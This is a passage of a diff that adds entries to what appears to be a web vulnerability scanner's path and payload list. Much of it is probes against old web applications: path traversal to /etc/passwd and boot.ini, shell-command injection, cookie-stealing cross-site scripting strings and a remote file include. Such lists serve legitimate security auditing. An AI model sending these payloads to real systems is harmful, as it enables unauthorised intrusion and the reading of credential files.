+ config/
1508
+ config/checks.txt
1509
+ config/html/cnf_gi.htm
1510
+ connect/
1511
+ console
1512
+ conspass.chl+
1513
+ consport.chl+
1514
+ content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:
1515
+ content/base/build/explorer/none.php?/etc/passwd
1516
+ contents.php?new_language=elvish&mode=select
1517
+ contents/extensions/asp/1
1518
+ convert-date.php
1519
+ correo/
1520
+ count.cgi
1521
+ counter-ord
1522
+ counter/
1523
+ counter/1/n/n/0/3/5/0/a/123.gif
1524
+ counterbanner
1525
+ counterbanner-ord
1526
+ counterfiglet-ord
1527
+ counterfiglet/nc/
1528
+ cp/rac/nsManager.cgi
1529
+ cpa.nsf
1530
+ cpanel/
1531
+ cplogfile.log
1532
+ cpqlogin.htm
1533
+ credit/
1534
+ crypto/
1535
+ cs
1536
+ csChatRBox.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
1537
+ csGuestBook.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
1538
+ csLive
1539
+ csLiveSupport.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
1540
+ csNews.cgi
1541
+ csNewsPro.cgi?command=savesetup&setup=;system('cat%20/etc/passwd')
1542
+ csPassword.cgi
1543
+ csPassword.cgi?command=remove%20
1544
+ csPassword/csPassword.cgi
1545
+ csSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`
1546
+ csh
1547
+ css
1548
+ cstat.pl
1549
+ cuenta/
1550
+ cuentas/
1551
+ current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
1552
+ current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1
1553
+ custdata/
1554
+ customerdata.nsf
1555
+ customers/
1556
+ cutecast/members/
1557
+ cutenews/comments.php
1558
+ cutenews/index.php?debug
1559
+ cutenews/search.php
1560
+ cutenews/shownews.php
1561
+ cvsblame.cgi?file=<script>alert('Vulnerable')</script>
1562
+ cvsblame.cgi?file=<script>alert('XSS')</script>
1563
+ cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>
1564
+ cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
1565
+ cvslog.cgi?file=<script>alert('Vulnerable')</script>
1566
+ cvslog.cgi?file=<script>alert('XSS')</script>
1567
+ cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
1568
+ cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
1569
+ cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
1570
+ cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
1571
+ cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD
1572
+ cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
1573
+ da.nsf
1574
+ dan_o.dat
1575
+ dansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>
1576
+ dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
1577
+ dasp/fm_shell.asp
1578
+ dat/
1579
+ data.sql
1580
+ data/
1581
+ data/config/microsrv.cfg
1582
+ data/fetch.php?page=
1583
+ data/member_log.txt
1584
+ data/userlog/log.txt
1585
+ database.nsf
1586
+ database/
1587
+ database/db2000.mdb
1588
+ database/metacart.mdb
1589
+ database/metacart.mdb+
1590
+ databases/
1591
+ databse.sql
1592
+ date
1593
+ dato/
1594
+ datos/
1595
+ day5datacopier.cgi
1596
+ day5datanotifier.cgi
1597
+ db.nsf
1598
+ db.php
1599
+ db.php?q='&t='
1600
+ db.sql
1601
+ db/
1602
+ db/users.dat
1603
+ db2www/library/document.d2w/show
1604
+ db4web_c/dbdirname//etc/passwd
1605
+ db_manager.cgi
1606
+ dbabble
1607
+ dbase/
1608
+ dbman/db.cgi?db=no-db
1609
+ dbmlparser.exe
1610
+ dc/auth_data/auth_user_file.txt
1611
+ dc/orders/orders.txt
1612
+ dcforum.cgi?az=list&forum=../../../../../../../../../../etc
1613
+ dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
1614
+ dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00
1615
+ dclf.nsf
1616
+ dcp/advertiser.php
1617
+ dcshop/auth_data/auth_user_file.txt
1618
+ dcshop/orders/orders.txt
1619
+ debug/dbg?host==<script>alert('Vulnerable');</script>
1620
+ debug/echo?name=<script>alert('Vulnerable');</script>
1621
+ debug/errorInfo?title===<script>alert('Vulnerable');</script>
1622
+ debug/showproc?proc===<script>alert('Vulnerable');</script>
1623
+ decsadm.nsf
1624
+ decsdoc.nsf
1625
+ decslog.nsf
1626
+ default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%
1627
+ default.nsf
1628
+ default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
1629
+ default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
1630
+ defines.php
1631
+ demo/
1632
+ demo/basic/simple/viewsrc/welcomeuser.jsp.txt
1633
+ demo/ojspext/events/globals.jsa
1634
+ demo/sql/index.jsp
1635
+ demo/xml/xmlquery/viewsrc/XMLQuery.jsp.txt
1636
+ demos/
1637
+ dev/
1638
+ dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00
1639
+ devel/
1640
+ development/
1641
+ dfire.cgi
1642
+ diagnose.cgi
1643
+ diapo.php?rep=<script>alert(document.cookie)</script>
1644
+ dig.cgi
1645
+ dir/
1646
+ dirassist.nsf
1647
+ directory.php?dir=%3Bcat%20/etc/passwd
1648
+ directory/
1649
+ directorypro.cgi?want=showcat&show=../../../../../../../../../../etc
1650
+ directorypro.cgi?want=showcat&show=../../../../../../../../../../etc/passwd%00
1651
+ displayTC.pl
1652
+ dltclnt.php
1653
+ dms0
1654
+ dnewsweb
1655
+ do_map
1656
+ do_subscribe
1657
+ doc
1658
+ doc-html/
1659
+ doc/
1660
+ doc/admin/index.php
1661
+ doc/domguide.nsf
1662
+ doc/dspug.nsf
1663
+ doc/help4.nsf
1664
+ doc/helpadmin.nsf
1665
+ doc/helplt4.nsf
1666
+ doc/internet.nsf
1667
+ doc/javapg.nsf
1668
+ doc/lccon.nsf
1669
+ doc/migrate.nsf
1670
+ doc/npn_admn.nsf
1671
+ doc/npn_rn.nsf
1672
+ doc/packages/
1673
+ doc/readmec.nsf
1674
+ doc/readmes.nsf
1675
+ doc/rt/overview-summary.html
1676
+ doc/smhelp.nsf
1677
+ doc/srvinst.nsf
1678
+ doc/webmin.config.notes
1679
+ docs/
1680
+ docs/<script>alert('Vulnerable');</script>
1681
+ docs/NED
1682
+ docs/NED?action=retrieve&location=.
1683
+ docs/sdb/en/html/index.html
1684
+ docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini
1685
+ doladmin.nsf
1686
+ dols_help.nsf
1687
+ domadmin.nsf
1688
+ domcfg.nsf
1689
+ domguide.nsf
1690
+ domlog.nsf
1691
+ donothing
1692
+ dose.pl?daily&somefile.txt&|ls|
1693
+ dostuff.php?action=modify_user
1694
+ dotproject/modules/files/index_table.php
1695
+ dotproject/modules/projects/addedit.php
1696
+ dotproject/modules/projects/view.php
1697
+ dotproject/modules/projects/vw_files.php
1698
+ dotproject/modules/tasks/addedit.php
1699
+ dotproject/modules/tasks/viewgantt.php
1700
+ down/
1701
+ download.cgi
1702
+ download.php?op=viewdownload
1703
+ download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>
1704
+ download/
1705
+ downloads/
1706
+ downloads/pafiledb.php?action=download&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
1707
+ downloads/pafiledb.php?action=email&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
1708
+ downloads/pafiledb.php?action=rate&id=4?\"&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\"
1709
+ dspug.nsf
1710
+ dumpenv.pl
1711
+ easylog/easylog.html
1712
+ echo.bat
1713
+ echo.bat?&dir+c:\\
1714
+ edit.pl
1715
+ edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd
1716
+ ejemplo/
1717
+ ejemplos/
1718
+ email.php
1719
+ emailfriend/emailarticle.php?id=\"<script>alert(document.cookie)</script>
1720
+ emailfriend/emailfaq.php?id=\"<script>alert(document.cookie)</script>
1721
+ emailfriend/emailnews.php?id=\"<script>alert(document.cookie)</script>
1722
+ emml_email_func.php
1723
+ employees/
1724
+ empower?DB=whateverwhatever
1725
+ emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../..
1726
+ emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
1727
+ emumail.cgi?type=.%00
1728
+ emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
1729
+ emumail.cgi?type=/../../../../../../../../../../../../../../../etc/passwd%00
1730
+ emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
1731
+ emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../etc
1732
+ enter.cgi
1733
+ entete.php
1734
+ enteteacceuil.php
1735
+ envia/
1736
+ enviamail/
1737
+ environ.cgi
1738
+ environ.pl
1739
+ environ.pl?param1=<script>alert(document.cookie)</script>
1740
+ erba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
1741
+ erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
1742
+ error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
1743
+ error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
1744
+ error/500error.jsp?et=1<script>alert('Vulnerable')</script>;
1745
+ error/HTTP_NOT_FOUND.html.var
1746
+ error_log
1747
+ errors/needinit.php?GALLERY_BASEDIR=http://xxxxxxxx/
1748
+ es/
1749
+ eshop.pl/seite=;cat%20eshop.pl|
1750
+ esp?PAGE=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
1751
+ etc/passwd
1752
+ etc/shadow+
1753
+ event.nsf
1754
+ eventcal2.php.php
1755
+ events.nsf
1756
+ events4.nsf
1757
+ events5.nsf
1758
+ eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script>
1759
+ eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script>
1760
+ ews/ews/architext_query.pl
1761
+ ex-logger.pl
1762
+ examples/
1763
+ examples/basic/servlet/HelloServlet
1764
+ examples/context
1765
+ examples/cookie
1766
+ examples/forward1
1767
+ examples/forward2
1768
+ examples/header
1769
+ examples/include1
1770
+ examples/info
1771
+ examples/jsp/index.html
1772
+ examples/jsp/snp/anything.snp
1773
+ examples/jsp/snp/snoop.jsp
1774
+ examples/jsp/source.jsp??
1775
+ examples/servlet/AUX
1776
+ examples/servlet/TroubleShooter
1777
+ examples/servlets/index.html
1778
+ examples/session
1779
+ examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>
1780
+ excel/
1781
+ exchange/
1782
+ exchange/lib/AMPROPS.INC
1783
+ exchange/lib/ATTACH.INC
1784
+ exchange/lib/DELETE.INC
1785
+ exchange/lib/GETREND.INC
1786
+ exchange/lib/GETWHEN.INC
1787
+ exchange/lib/JSATTACH.INC
1788
+ exchange/lib/JSROOT.INC
1789
+ exchange/lib/JSUTIL.INC
1790
+ exchange/lib/LANG.INC
1791
+ exchange/lib/PAGEUTIL.INC
1792
+ exchange/lib/PUBFLD.INC
1793
+ exchange/lib/RENDER.INC
1794
+ exchange/lib/SESSION.INC
1795
+ exchange/lib/logon.inc
1796
+ exchange/root.asp?acs=anon
1797
+ excite
1798
+ excite;IF
1799
+ excite;IFS=\
1800
+ exe/
1801
+ exec/show/config/cr
1802
+ ext.dll?MfcIsapiCommand=LoadPage&page=admin.hts%20&a0=add&a1=root&a2=%5C
1803
+ ext.ini.%00.txt
1804
+ ez2000/ezadmin.cgi
1805
+ ez2000/ezboard.cgi
1806
+ ez2000/ezman.cgi
1807
+ ezadmin.cgi
1808
+ ezboard.cgi
1809
+ ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1
1810
+ ezman.cgi
1811
+ ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
1812
+ ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
1813
+ ezshopper2/loadpage.cgi
1814
+ ezshopper3/loadpage.cgi
1815
+ faqman/index.php
1816
+ faqmanager.cgi?toc=/etc/passwd%00
1817
+ faxsurvey?cat%20/etc/passwd
1818
+ fbsd/
1819
+ fcgi-bin/echo
1820
+ fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script>
1821
+ fcgi-bin/echo2
1822
+ fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script>
1823
+ fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script>
1824
+ fcgi-bin/echo?foo=<script>alert('Vulnerable')</script>
1825
+ file-that-is-not-real-2002.php3
1826
+ file/
1827
+ file/../../../../../../../../etc/
1828
+ fileadmin/
1829
+ filemail
1830
+ filemail.pl
1831
+ filemanager/filemanager_forms.php
1832
+ filemanager/index.php3
1833
+ filemgmt/brokenfile.php
1834
+ filemgmt/singlefile.php
1835
+ filemgmt/viewcat.php
1836
+ filemgmt/visit.php
1837
+ files/
1838
+ finance.xls
1839
+ finances.xls
1840
+ finger
1841
+ finger.pl
1842
+ firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz
1843
+ firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script>
1844
+ flexform
1845
+ flexform.cgi
1846
+ fom.cgi?file=<script>alert('Vulnerable')</script>
1847
+ fom.cgi?file=<script>alert('XSS')</script>
1848
+ fom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable
1849
+ fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
1850
+ foo.php3
1851
+ forgot_password.php?email=\"><script>alert(document.cookie)</script>
1852
+ formmail
1853
+ formmail.cgi
1854
+ formmail.cgi?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
1855
+ formmail.pl
1856
+ formmail.pl?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
1857
+ formmail?recipient=root@localhost%0Acat%20/etc/passwd&email=joeuser@localhost&subject=test
1858
+ foro/YaBB.pl
1859
+ fortune
1860
+ forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd
1861
+ forum-ra.asp?n=../../../../../../../../../etc/passwd
1862
+ forum-ra.asp?n=../../../../../../../../../etc/passwd%00
1863
+ forum-ra.asp?n=/../../../../../../../../../../../boot.ini
1864
+ forum-ra.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
1865
+ forum-ra.asp?n=/etc/passwd
1866
+ forum-ra.asp?n=/etc/passwd%00
1867
+ forum-ra.asp?n=c:\boot.ini
1868
+ forum-ra_professionnel.asp?n=%60/etc/passwd%60
1869
+ forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00
1870
+ forum-ra_professionnel.asp?n=../../boot.ini
1871
+ forum-ra_professionnel.asp?n=/....../boot.ini
1872
+ forum-ra_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini
1873
+ forum-ra_professionnel.asp?n=/../../../../../../etc/passwd
1874
+ forum-ra_professionnel.asp?n=/../../../etc/passwd
1875
+ forum-ra_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini
1876
+ forum-ra_professionnel.asp?n=/etc/passwd
1877
+ forum-ra_professionnel.asp?n=/etc/passwd%00
1878
+ forum-ra_professionnel.asp?n=c:\boot.ini
1879
+ forum.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
1880
+ forum.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1881
+ forum.asp?n=../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1882
+ forum.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1883
+ forum.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1884
+ forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1885
+ forum.asp?n=/../../../etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1886
+ forum.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1887
+ forum.asp?n=/etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1888
+ forum.asp?n=/etc/passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1889
+ forum.asp?n=c:\boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
1890
+ forum/
1891
+ forum/admin/database/wwForum.mdb
1892
+ forum/admin/wwforum.mdb
1893
+ forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
1894
+ forum/mainfile.php
1895
+ forum/member.php
1896
+ forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script>
1897
+ forum/newreply.php
1898
+ forum/newthread.php
1899
+ forum/viewtopic.php
1900
+ forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1901
+ forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1902
+ forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1903
+ forum1.asp?n=../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1904
+ forum1.asp?n=/....../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1905
+ forum1.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_cu
1906
+ forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1907
+ forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1908
+ forum1.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1909
+ forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1910
+ forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1911
+ forum1.asp?n=1753&amp;nn=%60/etc/passwd%60
1912
+ forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd
1913
+ forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd
1914
+ forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00
1915
+ forum1.asp?n=1753&amp;nn=/....../boot.ini
1916
+ forum1.asp?n=1753&amp;nn=/..../boot.ini
1917
+ forum1.asp?n=1753&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini
1918
+ forum1.asp?n=1753&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini
1919
+ forum1.asp?n=1753&amp;nn=/etc/passwd
1920
+ forum1.asp?n=1753&amp;nn=/etc/passwd%00
1921
+ forum1.asp?n=1753&amp;nn=c:\boot.ini
1922
+ forum1.asp?n=c:\boot.ini&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1923
+ forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1924
+ forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requi
1925
+ forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_curren
1926
+ forum1_professionnel.asp?n=/....../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1927
+ forum1_professionnel.asp?n=/.../.../.../.../.../.../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_recor
1928
+ forum1_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requeste
1929
+ forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_rec
1930
+ forum1_professionnel.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_reco
1931
+ forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1932
+ forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1933
+ forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1
1934
+ forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1
1935
+ forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1
1936
+ forum1_professionnel.asp?n=1771&amp;nn=/....../boot.ini&amp;page=1
1937
+ forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../../../../../../../../../../../../../boot.ini&amp;page=1
1938
+ forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1
1939
+ forum1_professionnel.asp?n=1771&amp;nn=/.\"./.\"./.\"./.\"./.\"./boot.ini&amp;page=1
1940
+ forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1
1941
+ forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1
1942
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60
1943
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd
1944
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00
1945
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/....../boot.ini
1946
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/..../boot.ini
1947
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini
1948
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../../../../../../../../../../../boot.ini
1949
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd
1950
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.\"./.\"./.\"./.\"./.\"./boot.ini
1951
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd
1952
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00
1953
+ forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=c:\boot.ini
1954
+ forum1_professionnel.asp?n=1771&amp;nn=c:\boot.ini&amp;page=1
1955
+ forum1_professionnel.asp?n=c:\boot.ini&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.
1956
+ forum_arc.asp?n=%60/etc/passwd%60|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
1957
+ forum_arc.asp?n=../../../../../../../../../etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1958
+ forum_arc.asp?n=/....../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1959
+ forum_arc.asp?n=/.../.../.../.../.../.../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1960
+ forum_arc.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1961
+ forum_arc.asp?n=/../../../../../../../../etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1962
+ forum_arc.asp?n=/.\"./.\"./.\"./.\"./.\"./boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1963
+ forum_arc.asp?n=/etc/passwd%00|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1964
+ forum_arc.asp?n=/etc/passwd|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1965
+ forum_arc.asp?n=268
1966
+ forum_arc.asp?n=c:\boot.ini|36|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.
1967
+ forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22
1968
+ forum_professionnel.asp?n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;.
1969
+ forum_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1970
+ forum_professionnel.asp?n=../../../../../../../../../etc/passwd%00|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1971
+ forum_professionnel.asp?n=/....../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1972
+ forum_professionnel.asp?n=/.../.../.../.../.../.../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1973
+ forum_professionnel.asp?n=/../../../../../../../../../../../../../../../../../../../../boot.ini|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.
1974
